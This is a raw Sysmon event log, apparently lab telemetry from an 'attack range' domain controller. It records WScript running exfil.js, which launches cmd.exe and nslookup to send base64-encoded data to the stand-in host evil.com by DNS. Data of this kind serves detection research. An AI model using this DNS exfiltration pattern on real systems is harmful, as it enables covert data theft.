14:16:29.680{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.680{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.680{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.680{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.680{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3D40-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.680{2E1864BB-17BD-629A-3B40-000000005F02}50608064C:\Windows\system32\cmd.exe{2E1864BB-17BD-629A-3D40-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.689{2E1864BB-17BD-629A-3D40-000000005F02}7036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BD-629A-3B40-000000005F02}5060C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlerm.tmp 2>&1 10341000x8000000000000000199909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.649{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3C40-000000005F02}2672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.649{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3C40-000000005F02}2672C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.649{2E1864BB-17BD-629A-3C40-000000005F02}26721136C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3B40-000000005F02}5060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.618{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3C40-000000005F02}2672C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.616{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3B40-000000005F02}5060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.614{2E1864BB-17A1-629A-783D-000000005F02}55526108C:\Windows\System32\WScript.exe{2E1864BB-17BD-629A-3B40-000000005F02}5060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.614{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.614{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.614{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.614{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.613{2E1864BB-17BD-629A-3B40-000000005F02}5060C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlerm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.594{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlngid.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000199897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.757{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52666- 354300x8000000000000000199896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.757{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52665- 354300x8000000000000000199895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.756{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52664- 354300x8000000000000000199894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.662{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52663- 354300x8000000000000000199893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.662{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52662- 354300x8000000000000000199892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.662{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52661- 354300x8000000000000000199891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.598{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52660- 354300x8000000000000000199890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.598{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52659- 354300x8000000000000000199889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.598{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52658- 354300x8000000000000000199888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.329{00000000-0000-0000-0000-000000000000}3168<unknown process>-udpfalsefalse127.0.0.1-52650-false127.0.0.1-53domain 354300x8000000000000000199887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.329{00000000-0000-0000-0000-000000000000}3168<unknown process>-udpfalsefalse127.0.0.1-52648-false127.0.0.1-53domain 354300x8000000000000000199886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.265{00000000-0000-0000-0000-000000000000}4540<unknown process>-udpfalsefalse127.0.0.1-52647-false127.0.0.1-53domain 354300x8000000000000000199885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.265{00000000-0000-0000-0000-000000000000}4540<unknown process>-udptruefalse127.0.0.1-52646-false127.0.0.1-53domain 354300x8000000000000000199884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.265{00000000-0000-0000-0000-000000000000}4540<unknown process>-udpfalsefalse127.0.0.1-52645-false127.0.0.1-53domain 354300x8000000000000000199883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.265{00000000-0000-0000-0000-000000000000}4540<unknown process>-udptruefalse127.0.0.1-52645-false127.0.0.1-53domain 354300x8000000000000000199882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.211{00000000-0000-0000-0000-000000000000}6196<unknown process>-udpfalsefalse127.0.0.1-52644-false127.0.0.1-53domain 354300x8000000000000000199881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.211{00000000-0000-0000-0000-000000000000}6196<unknown process>-udptruefalse127.0.0.1-52644-false127.0.0.1-53domain 354300x8000000000000000199880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.210{00000000-0000-0000-0000-000000000000}6196<unknown process>-udptruefalse127.0.0.1-52642-false127.0.0.1-53domain 354300x8000000000000000199879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.143{00000000-0000-0000-0000-000000000000}1496<unknown process>-udpfalsefalse127.0.0.1-52641-false127.0.0.1-53domain 10341000x8000000000000000199878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.516{2E1864BB-17BD-629A-3940-000000005F02}56962568C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3A40-000000005F02}7172C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.516{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.516{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.516{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.516{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.515{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3A40-000000005F02}7172C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 